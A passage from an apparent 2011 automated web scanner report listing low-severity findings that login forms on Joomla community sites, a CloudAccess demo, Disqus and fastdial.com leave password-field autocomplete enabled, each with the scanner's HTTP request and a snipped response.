Severity:   Low
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/sites/new.html

Issue detail

The page contains a form with the following action URL:
  • http://community.joomla.org/showcase/sites.html
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /showcase/sites/new.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=423eae15ca00d1e8cf624b675f042aa5; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/sites.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.27. http://community.joomla.org/user-groups.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /user-groups.html

Issue detail

The page contains a form with the following action URL:
  • http://community.joomla.org/user-groups.html
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /user-groups.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 205369


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<div class="moduletable-jedlogin">
                   <form action="/user-groups.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.28. http://demo16.cloudaccess.net/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://demo16.cloudaccess.net
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://demo16.cloudaccess.net/index.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET / HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Set-Cookie: 0d4018dcd0961c57d0d37c72abf6777f=0jc68bdosfv0usmfgmt3kojis0; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...
</h3>
<form action="/index.php" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.29. http://demo16.cloudaccess.net/administrator/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://demo16.cloudaccess.net
Path:   /administrator/index.php

Issue detail

The page contains a form with the following action URL:
  • http://demo16.cloudaccess.net/administrator/index.php
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /administrator/index.php HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Set-Cookie: 3cd367566174a1f3a2f806869f69204d=tfi2vmv2kpu2qbp7plrssh0ha6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4671
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<div class="m">
               <form action="/administrator/index.php" method="post" id="form-login">
   <fieldset class="loginform">
...[SNIP]...
</label>
               <input name="passwd" id="mod-login-password" type="password" class="inputbox" size="15" />

               <label id="mod-login-language-lbl" for="lang">
...[SNIP]...

15.30. http://disqus.com/profile/login/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disqus.com
Path:   /profile/login/

Issue detail

The page contains a form with the following action URL:
  • https://secure.disqus.com/profile/login/?next=http://disqus.com/
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /profile/login/ HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:33 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Length: 6310
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <link rel="shortcut
...[SNIP]...
</h3>
                                   

<form id="login-form" action="https://secure.disqus.com/profile/login/?next=http://disqus.com/" method="post" accept-charset="utf-8">
   <label>
...[SNIP]...
</span>
       <input type="password" name="password" tabindex="21" />
   </label>
...[SNIP]...

15.31. http://docs.joomla.org/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /index.php

Issue detail

The page contains a form with the following action URL:
  • http://docs.joomla.org/index.php?title=Special:UserLogin&action=submitlogin&type=signup&returnto=Main_Page
The form contains the following password fields with autocomplete enabled:
  • wpPassword
  • wpRetype

Request

GET /index.php?title=Special:UserLogin&type=signup&returnto=Main_Page HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Set-Cookie: docsj_mediawiki_session=40d5d912ccf86251c09e6204ee9fda3b; path=/; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<div id="userlogin">

<form name="userlogin2" id="userlogin2" method="post" action="/index.php?title=Special:UserLogin&amp;action=submitlogin&amp;type=signup&amp;returnto=Main_Page">
   <h2>
...[SNIP]...
<td class="mw-input">
               <input type='password' class='loginPassword' name="wpPassword" id="wpPassword2"
                   tabindex="2"
                   value="" size='20' />

           </td>
...[SNIP]...
<td class="mw-input">
               <input type='password' class='loginPassword' name="wpRetype" id="wpRetype"
                   tabindex="4"
                   value=""
                   size='20' />

           </td>
...[SNIP]...

15.32. http://extensions.joomla.org/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://extensions.joomla.org/index.php
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET / HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=9b5564d7b57848ef22bf9ac141472038; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/index.php" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.33. http://extensions.joomla.org/extensions

Summary

Severity:   Low
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions

Issue detail

The page contains a form with the following action URL:
  • http://extensions.joomla.org/extensions
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /extensions HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=8ce91e96c30d6b3c03ce44895359f0bf; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/extensions" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.34. http://extensions.joomla.org/extensions/advanced-search

Summary

Severity:   Low
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions/advanced-search

Issue detail

The page contains a form with the following action URL:
  • http://extensions.joomla.org/extensions
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /extensions/advanced-search HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=662ff80b6519b113832192982b098a5a; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/extensions" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.35. http://extensions.joomla.org/extensions/languages/translations-for-joomla

Summary

Severity:   Low
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions/languages/translations-for-joomla

Issue detail

The page contains a form with the following action URL:
  • http://extensions.joomla.org/extensions
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /extensions/languages/translations-for-joomla HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=119690ae64f99e48cab89680209b4270; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/extensions" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.36. http://extensions.joomla.org/extensions/new

Summary

Severity:   Low
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions/new

Issue detail

The page contains a form with the following action URL:
  • http://extensions.joomla.org/extensions
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /extensions/new HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=bd83a0d831a42c661eb59a60c147c8f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/extensions" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.37. http://fastdial.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fastdial.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://fastdial.com/welcome-fast-dial-firefox-4?destination=node%2F3
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET / HTTP/1.1
Host: fastdial.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:03:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81; expires=Thu, 17-Feb-2011 05:36:34 GMT; path=/; domain=.fastdial.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:03:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 5182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><form action="/welcome-fast-dial-firefox-4?destination=node%2F3" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.38. http://fastdial.com/0

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fastdial.com
Path:   /0

Issue detail

The page contains a form with the following action URL:
  • http://fastdial.com/welcome-fast-dial-firefox-4?destination=node%2F3
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /0 HTTP/1.1
Host: fastdial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:05:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 5182
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><form action="/welcome-fast-dial-firefox-4?destination=node%2F3" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.39. http://fastdial.com/user

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fastdial.com
Path:   /user

Issue detail

The page contains a form with the following action URL:
  • http://fastdial.com/user
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /user HTTP/1.1
Host: fastdial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:05:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 4772
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="clear-block">
<form action="/user" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
<div class="description">
...[SNIP]...

15.40. http://fastdial.com/website

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fastdial.com
Path:   /website

Issue detail

The page contains a form with the following action URL:
  • http://fastdial.com/website?destination=website
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /website HTTP/1.1
Host: fastdial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:05:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><form action="/website?destination=website" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.41. http://fastdial.com/welcome-fast-dial-firefox-4

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fastdial.com
Path:   /welcome-fast-dial-firefox-4

Issue detail

The page contains a form with the following action URL:
  • http://fastdial.com/welcome-fast-dial-firefox-4?destination=node%2F3
The form contains the following password field with autocomplete enabled:
  • pass

Request

POST /welcome-fast-dial-firefox-4?destination=node%2F3 HTTP/1.1
Host: fastdial.com
Proxy-Connection: keep-alive
Referer: http://fastdial.com/
Cache-Control: max-age=0
Origin: http://fastdial.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81
Content-Length: 98

name=&pass=&op=Log+in&form_build_id=form-f79ff6c4b14a4b6ff80bfa544715655b&form_id=user_login_block

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:03:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:03:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 5321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><form action="/welcome-fast-dial-firefox-4?destination=node%2F3" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required error" />
</div>
...[SNIP]...

15.42. http://forum.joomla.org/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forum.joomla.org
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://forum.joomla.org/ucp.php?mode=login&sid=3b5661e788faab67f2027dc376b326d5
The form contains the following password field with autocomplete enabled:
  • password

Request

GET / HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=3b5661e788faab67f2027dc376b326d5; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<br clear="all" class="breakpad" />

   <form method="post" action="./ucp.php?mode=login&amp;sid=3b5661e788faab67f2027dc376b326d5">
   
   <table class="tablebg" width="100%" cellspacing="1">
...[SNIP]...
</span> <input class="post" type="password" name="password" size="10" />&nbsp; <span class="gensmall">
...[SNIP]...

15.43. http://forum.joomla.org/ucp.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forum.joomla.org
Path:   /ucp.php

Issue detail

The page contains a form with the following action URL:
  • http://forum.joomla.org/ucp.php?mode=login&sid=19d91383ba404ea6abc69bff18558c0e
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /ucp.php HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:55 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=19d91383ba404ea6abc69bff18558c0e; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<br />

